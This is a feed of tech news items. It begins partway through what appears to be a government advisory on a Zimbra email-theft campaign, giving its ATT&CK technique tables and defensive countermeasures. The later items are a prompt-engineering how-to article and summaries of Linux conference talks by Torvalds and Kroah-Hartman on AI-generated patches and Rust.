<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are collected via API calls to the ZCS mail server and are not collected from emails stored directly on the victim’s device. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Automated Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1119/" target="_blank"><u>T1119</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Upon execution, the JavaScript payload automatically collects all relevant information in stages. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Browser Session Hijacking </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank"><u>T1185</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload leverages the user’s authenticated browser session to make API requests as the user. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Archive Collected Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank"><u>T1560</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are exfiltrated with GZIP compression. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 18: Discovery </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Discovery </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank"><u>T1087</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stolen Global Access Lists provide the group with new users to target. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 19: Exfiltration </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/" target="_blank"><u>T1048</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Victim information was exfiltrated over both HTTPS and DNS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank"><u>T1048.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some payloads, especially ones with large amounts of data, were exfiltrated over HTTPS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank"><u>T1048.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some smaller bandwidth payloads were exfiltrated over DNS using Base32 encoding. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<h2><strong>Appendix B: MITRE D3FEND countermeasures </strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table20"><strong>Table 20</strong></a> for a mapping of several of the cybersecurity countermeasures mentioned in this advisory. <a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<div class="TableContainer Ltr SCXW46665017 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 20: MITRE D3FEND Countermeasures </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Countermeasure Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Description</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Application Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank"><u>D3-AH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should immediately prioritize patching <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank"><u>CVE-2025-66376</u></a>.  </li>
<li>Organizations should promptly apply software updates to all email systems. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Isolate </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank"><u>d3f:Isolate</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations that cannot feasibly patch should use alternative mail clients. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Credential Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank"><u>D3-CH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should consider using a third-party authentication service that supports passkeys to mediate access to ZCS and other services that do not natively support passkeys. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank"><u>D3-NTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>DNS Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank"><u>D3-DNSTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Community Deviation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation" target="_blank"><u>D3-NTCD</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain. </li>
<li>Organizations should monitor for connections to internal services, such as webmail, from VPN providers. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Identifier Activity Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank"><u>D3-IAA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should search for the listed known IOCs. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Process Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank"><u>D3-PA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should search ZCS log files for specific commands used by the malicious script. </li>
<li>Organizations should search the localStorage property in web browsers for the ZCS webmail client for “ZimbraWeb” Application Passcodes. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>Message Analysis</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis">D3-MA</a></td>
<td>Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop asking AI nicely: Here’s how to get work-ready results every time]]></title>
<description><![CDATA[Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation fo...]]></description>
<link>https://tsecurity.de/de/3694396/it-security-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694396/it-security-nachrichten/stop-asking-ai-nicely-heres-how-to-get-work-ready-results-every-time/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past few years, I have learned that basic prompts produce inconsistent, hallucination-prone results that no executive would trust in production. What turned the tide was my move to advanced prompting techniques. These weren’t theoretical experiments; they became a practical foundation for reliable, measurable outcomes. I want to share the techniques that consistently delivered the biggest gains in my projects, complete with real before-and-after examples, copy-paste templates, lessons from failures and guidance on when to evolve beyond prompting to agentic systems.</p>



<h2 class="wp-block-heading">Why advanced prompting still matters in enterprise settings</h2>



<p class="wp-block-paragraph">Sophisticated prompting remains essential for control, reliability and compliance. If you “ask nicely” and hope for the best, you need deterministic behavior, auditable reasoning and minimal risk of hallucination. Here’s what worked for me.</p>



<h3 class="wp-block-heading">1. Chain-of-Thought (CoT) and its variants: Unlocking step-by-step reasoning</h3>



<p class="wp-block-paragraph"><strong>The problem:</strong> Models would jump to conclusions on complex analysis tasks, especially involving data interpretation or multi-step logic.</p>



<p class="wp-block-paragraph"><strong>What I did:</strong> I started explicitly instructing the model to “think step by step” and show its reasoning.</p>



<p class="wp-block-paragraph"><strong>Before (basic prompt): </strong>“Analyze last quarter’s sales data and recommend three actions.”</p>



<p class="wp-block-paragraph"><strong>After (CoT prompt):</strong></p>



<p class="wp-block-paragraph">“You’re a senior business analyst. Analyze the following sales data step by step: [data]. First, identify the key trends. Second, calculate the rates and anomalies. Third, link findings to business context. Finally, recommend the three prioritized actions with expected impact. Explain your reasoning at each step.”  </p>



<p class="wp-block-paragraph"><strong>Results:</strong> Accuracy and depth improved dramatically.</p>



<p class="wp-block-paragraph"><strong>Variants that worked well:</strong> Self-consistency. I ran the same CoT prompt multiple times and took the majority consensus. This reduced variability significantly.</p>



<p class="wp-block-paragraph"><strong>Template you can use:</strong></p>



<pre class="wp-block-code"><code>You are [expert role]. Solve this problem by thinking step by step.

[Task or question]

For each step:

1. State your observation or calculation.

2. Explain the implication.

3. Proceed only when confident.

Final answer in this format: [structured output]</code></pre>



<h3 class="wp-block-heading">2. Tree-of-Thoughts (ToT): Exploring multiple reasoning paths</h3>



<p class="wp-block-paragraph">For truly complex decisions such as resource allocation or risk assessment, linear CoT isn’t enough. Tree-of-Thoughts lets the model generate and evaluate multiple branches.</p>



<p class="wp-block-paragraph"><strong>Example:</strong> I was helping a client evaluate three potential vendor platforms for an AI deployment. A standard prompt gave a superficial comparison. With ToT</p>



<p class="wp-block-paragraph"><strong>Prompt Snippet:</strong></p>



<pre class="wp-block-code"><code>Explore three different reasoning paths for selecting the best vendor platform:

Path 1: Focus on cost and scalability.

Path 2: Focus on security, compliance and integration.

Path 3: Focus on innovation and long-term roadmap.

For each path, evaluate pros/cons against our requirements [list].

Then, compare the paths and recommend the strongest overall option with justification.</code></pre>



<p class="wp-block-paragraph"><strong>Outcome:</strong> The model surfaced nuanced trade-offs (e.g., one vendor had superior security, but higher integration cost).</p>



<p class="wp-block-paragraph"><strong>When to use:</strong> Strategic planning, troubleshooting or scenarios with high uncertainty and multiple viable approaches.</p>



<h3 class="wp-block-heading">3. ReAct (Reason+ Act) and prompt chaining: Moving toward agentic behavior</h3>



<p class="wp-block-paragraph">One of the biggest leaps I have noticed comes from combining reasoning with tool use and chaining prompts.</p>



<p class="wp-block-paragraph"><strong>ReAct example</strong>: (used in data analytics workflow)</p>



<pre class="wp-block-code"><code>You are an AI analyst with access to tools. For the query below:

1. Reason about what information you need.

2. Choose the appropriate tool or action.

3. Observe the result.

4. Repeat until you can answer confidently.

Query: [user request]</code></pre>



<p class="wp-block-paragraph">In practice, I chained this with retrieval tools. One automated quarterly compliance reporting; the system reasoned about required data, pulled relevant records, validated them, and generated the reports.</p>



<h3 class="wp-block-heading">4. Meta-prompting and self-reflection: Letting the model improve itself</h3>



<p class="wp-block-paragraph">Use the model to refine its own prompt. This is a huge time-saver.</p>



<pre class="wp-block-code"><code>You are an expert prompt engineer. Improve the following prompt for clarity, structure and effectiveness with [target model]. Make it more precise while preserving intent.

Original prompt: [paste]

Provide the improved version and explain your changes.</code></pre>



<p class="wp-block-paragraph">Self-reflection loops (asking the model to critique its own output and revise) are a game-changer for content generation and code-review tasks.</p>



<h3 class="wp-block-heading">5. Multimodal and structured output techniques</h3>



<p class="wp-block-paragraph">With vision-enabled models, I started combining text with images (e.g., uploading architecture diagrams or dashboards).</p>



<p class="wp-block-paragraph"><strong>Tip from experience:</strong> Be extremely specific in describing what the models should focus on.</p>



<h4 class="wp-block-heading">Best practices I learned the hard way</h4>



<ul class="wp-block-list">
<li><strong>Start simple, then layer complexity</strong>: Over-engineered prompts from Day One usually backfire.</li>



<li><strong>Model specific tuning:</strong> Some models respond better to XML delimiters; others to explicit reasoning.</li>



<li><strong>Evaluation and versioning:</strong> Treat prompts like code if you track versions and run automated evals.</li>



<li><strong>Security guardrails:</strong> Always include instructions against prompt injections and respect data boundaries.</li>



<li><strong>When to stop prompting</strong>: For repetitive, high-stakes workflows, move to full agents or an orchestration framework.</li>
</ul>



<h2 class="wp-block-heading">Final takeaways for technical leaders</h2>



<p class="wp-block-paragraph">Advanced prompt engineering has now become a core competency for anyone responsible for enterprise AI outcomes. Start by picking one technique and apply it rigorously to a real business problem. Document before/ after and you will notice why it’s worth mastering.</p>



<p class="wp-block-paragraph">The field continues evolving towards more automated and agentic systems, but the ability to precisely direct AI reasoning remains foundational.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linus Torvalds on AI, Junk Patches, Humans, and Godzilla]]></title>
<description><![CDATA[Linus Torvalds once said LLMs might bring a 10X increase to programmer productivity. But speaking at Open Source Summit India 2026, he now says that number was "not scientific,"
reports ZDNet. "That was pulled out of my ass number, obviously."


Today, he continued, "we're at the point where hope...]]></description>
<link>https://tsecurity.de/de/3693456/linux-tipps/linus-torvalds-on-ai-junk-patches-humans-and-godzilla/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693456/linux-tipps/linus-torvalds-on-ai-junk-patches-humans-and-godzilla/</guid>
<pubDate>Sat, 25 Jul 2026 10:12:40 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Linus Torvalds once said LLMs might bring a 10X increase to programmer productivity. But speaking at Open Source Summit India 2026, he now says that number was "not scientific,"
reports ZDNet. "That was pulled out of my ass number, obviously."


Today, he continued, "we're at the point where hopefully it creates more productivity than it takes away," but "we certainly saw more junk being generated by LLMs than we saw useful code up until the like early this year.... it can actually be a huge drain on resources when it takes humans a lot of effort to figure out that, hey, this machine-generated report was not true." Even now, he said, "most of the good ones require more than just the LLM," because "we've had to push back quite a bit... if you find a bug with an LLM, it's not enough to just ask the LLM to make a bug report and then throw it over the fence to us. We want to see a suggested patch; we want to see the human who ran the LLM act as a kind of back-and-forth." 

Torvalds described many AI-generated patches as "mindless band-aid kind of patches... they may fix the immediate problem, but the kind of bug remains, and it just is waiting in the hallway to hit you in another place." For his own toy projects, he uses LLMs as prototypers: "I use them as a way to prototype things... quite often the code is not usable in that form, but it's a great way to try something out," while insisting that for kernel-level fixes, "LLMs, in my experience, have not been at that level yet." 

Torvalds acknowledged that some AI-found issues have been "absolutely, stunningly, I mean, interesting in a painful kind of way," especially security problems that "show up in the technology press two days later." Despite the embarrassment, he said, "I'm very much not a shoot-the-messenger kind of person. I think we're much better off with LLMs finding bugs, even when they are embarrassing, and they are things that we should probably have found two decades ago."

 

Torvalds also said he's using AI "for my own toy projects... Every time I travel to some new place, and this is the first time I've been to India, I send the kids pictures of where I am, and for some strange reason, Godzilla seems to follow me around and gets added to those pictures." 

ZDNet notes that Torvalds concluded, "There are many useful and less useful uses for AI," and "I think Godzilla is a great place to stop." 

Thanks to Slashdot reader joshuark for sharing the article.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Linus+Torvalds+on+AI%2C+Junk+Patches%2C+Humans%2C+and+Godzilla%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F12%2F2053201%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F12%2F2053201%2Flinus-torvalds-on-ai-junk-patches-humans-and-godzilla%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/07/12/2053201/linus-torvalds-on-ai-junk-patches-humans-and-godzilla?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linus Torvalds on Rust, C, Bugs, and AI Patch-Checking Tools]]></title>
<description><![CDATA["Git and email are the two really only tools I use," Linus Torvalds said at Open Source Summit India 2026. But ZDNet reports that he also shared his thoughts on Rust, C, and patch-checking tools:



"I use Google as a way to look things up." He added, "I'm unusual; most of the other maintainers e...]]></description>
<link>https://tsecurity.de/de/3693455/linux-tipps/linus-torvalds-on-rust-c-bugs-and-ai-patch-checking-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693455/linux-tipps/linus-torvalds-on-rust-c-bugs-and-ai-patch-checking-tools/</guid>
<pubDate>Sat, 25 Jul 2026 10:12:38 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["Git and email are the two really only tools I use," Linus Torvalds said at Open Source Summit India 2026. But ZDNet reports that he also shared his thoughts on Rust, C, and patch-checking tools:



"I use Google as a way to look things up." He added, "I'm unusual; most of the other maintainers end up using many more tools, and I think a lot of them are starting to use AI tools for patch checking," while he "works at a higher level. I work with people, not tools." 

When asked about Rust both in Git and the kernel, he pushed back against hype: "I'm not sure Rust is going to take over the world. I still think Rust is very interesting, [but] I still find C to be a much simpler tool." Torvalds continued, "I'm much more excited about all the tools we have for verification of C," including "automated patch verification tools" and "automated email checking tools for patches like Sashiko." Summing up, Torvalds told the Mumbai audience: "I'm more of a hack-and-slash kind of person, and I still like the raw and simple power of C, and I don't think that's going to change." 

Torvalds also warned against overestimating Rust's benefits: "Rust fixes a few easy bugs that you can make in C, but it does not fix the logic errors, right? It does not think for you, and when you write incorrect code, the language does not matter. The end result will be incorrect." On mixed C/Rust code bases, he pointed out that guarantees are limited: "The guarantees that Rust give you only apply in the Rust-only parts of your code base, and wherever you interact with C code, all bets are off," with most Rust code in Linux talking to "core kernel C code" that is "much better quality... because that code has been tested in every single environment." 

At the same time, Torvalds pointed out, "some of our big and more high-profile bugs in the kernel lately have been logic errors" rather than the kind of memory errors Rust prevents. 

"It was just bad programming, which sadly happens even in carefully maintained subsystems and important kernels that are supposed to be very secure."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Linus+Torvalds+on+Rust%2C+C%2C+Bugs%2C+and+AI+Patch-Checking+Tools%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F12%2F2126243%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F12%2F2126243%2Flinus-torvalds-on-rust-c-bugs-and-ai-patch-checking-tools%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/07/12/2126243/linus-torvalds-on-rust-c-bugs-and-ai-patch-checking-tools?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust Will Help Linux Succeed and Makes Coding Fun, Says Greg Kroah-Hartman]]></title>
<description><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust...]]></description>
<link>https://tsecurity.de/de/3693453/linux-tipps/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693453/linux-tipps/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</guid>
<pubDate>Sat, 25 Jul 2026 10:12:26 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust. Git is moving toward Rust. Lots of projects are starting to move toward Rust."
 

He didn't always feel that way. Kroah-Hartman added, "A number of years ago, when a friend of mine said, 'Ah, you got to try this new language. It's called Rust.' I was like, 'What? No, C is great.' His friend continued, "'No, no, no! It makes programming fun again.' I'm like, 'Nah, programming is fun in C.' He was right. I should have done it then. Rust is actually fun. It makes programming fun. It takes a lot of stuff away from having to worry about the compiler, which can fix a lot of your problems for you, and it makes code a little bit better." 

So, Kroah-Hartman has moved from being a Rust skeptic to one of its strongest champions inside the kernel. He now regards Rust as a permanent part of Linux, not an experiment. His case is straightforward: Rust's ownership and type system can eliminate most of the "stupid little tiny things" that dominate kernel Common Vulnerabilities and Exposures (CVEs), while making life easier for overworked maintainers. "Rust," in short, "makes my life so much easier...." In India, he said Linux sees "about 13 CVEs a day" and has been running at "almost nine changes an hour" for a decade or more. Most of those vulnerabilities, he argued, are not exotic attacks but simple C mistakes — unchecked pointers, forgotten unlocks, and sloppy cleanup paths: "This is what we're fixing 13 times a day. Small, trivial, little bugs like this all the time.... I've seen every CVE the kernel has done in the past 25 years. I think 80% would be gone, just because they would be caught by Rust." The remaining 20% are the logic bugs he'd prefer to focus on...." 

 Moreover, Rust is becoming the default for new work in key subsystems. "New drivers for some subsystems are only going to be accepted in Rust...." he said. Binder, the Android IPC mechanism at the heart of billions of devices, now has parallel C and Rust implementations in the kernel. The C version "will go away soon," leaving the Rust version "as the bedrock of all Android devices going forward."<p></p><div class="share_submission">
